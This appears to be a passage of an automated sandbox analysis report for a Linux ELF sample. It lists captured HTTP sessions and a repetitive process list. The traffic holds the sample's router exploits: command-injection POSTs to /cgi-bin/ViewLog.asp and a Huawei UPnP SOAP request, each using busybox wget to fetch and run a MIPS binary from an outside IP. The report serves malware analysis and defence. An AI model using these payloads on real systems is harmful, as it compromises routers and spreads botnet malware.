                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              788192.168.2.145691495.86.126.308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.219424963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              789192.168.2.1455710154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.220153093 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:21Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              790192.168.2.1456338106.52.246.19823
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.228454113 CET225INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 39 3a 32 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:19:25Auth Result: ????.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              791192.168.2.145028494.46.180.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.604371071 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:23.150145054 CET401INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 23 Nov 2023 04:18:22 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://192.168.0.14/cgi-bin/ViewLog.asp
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              792192.168.2.145602694.130.56.1278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.747184992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.934252024 CET383INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Thu, 23 Nov 2023 04:18:22 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Content-Encoding: gzip
                                              Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              793192.168.2.1455740154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.864377022 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:22Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              794192.168.2.1456376106.52.246.19823
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.916609049 CET225INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 39 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:19:26Auth Result: ????.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              795192.168.2.143470094.120.217.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.161077023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              796192.168.2.144461241.40.32.14037215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.200632095 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:23.469525099 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              797192.168.2.144809631.187.79.538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.412488937 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              798192.168.2.144707685.122.216.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.433737993 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              799192.168.2.1455752154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.512516975 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:22Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              800192.168.2.1456388106.52.246.19823
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:23.579962969 CET225INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 39 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:19:26Auth Result: ????.


                                              System Behavior

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:/tmp/kTnqWHyjjG.elf
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:36
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:36
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:36
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:36
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:17:31
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                              Start time (UTC):04:14:47
                                              Start date (UTC):23/11/2023
                                              Path:/tmp/kTnqWHyjjG.elf
                                              Arguments:-
                                              File size:4463432 bytes
                                              MD5 hash:cd177594338c77b895ae27c33f8f86cc